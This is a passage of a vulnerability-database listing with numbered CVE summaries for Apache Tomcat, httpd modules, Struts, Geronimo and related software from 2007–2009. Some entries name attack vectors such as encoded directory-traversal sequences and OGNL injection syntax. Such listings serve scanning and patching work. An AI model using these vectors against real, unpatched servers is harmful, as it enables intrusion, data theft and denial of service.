3195| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
3196| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
3197| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
3198| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
3199| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
3200| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
3201| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
3202| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
3203| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
3204| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
3205| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
3206| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
3207| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
3208| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
3209| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
3210| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
3211| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
3212| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
3213| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
3214| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
3215| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
3216| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
3217| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
3218| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
3219| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
3220| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
3221| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
3222| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
3223| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
3224| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
3225| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
3226| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
3227| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
3228| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
3229| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
3230| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
3231| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
3232| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
3233| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
3234| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
3235| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
3236| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
3237| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
3238| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
3239| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
3240| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
3241| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
3242| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers to bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
3243| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
3244| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
3245| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
3246| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
3247| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
3248| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
3249| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
3250| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
3251| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
3252| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
3253| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
3254| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
3255| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
3256| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
3257| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
3258| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
3259| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
3260| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
3261| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
3262| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
3263| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
3264| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
3265| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
3266| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
3267| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
3268| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
3269| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3270| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
3271| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
3272| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
3273| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
3274| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
3275| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
3276| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
3277| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
3278| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
3279| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
3280| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
3281| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
3282| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
3283| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3284| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
3285| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
3286| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
3287| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
3288| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
3289| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
3290| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
3291| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
3292| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
3293| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
3294| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
3295| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
3296| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
3297| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
3298| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
3299| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
3300| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
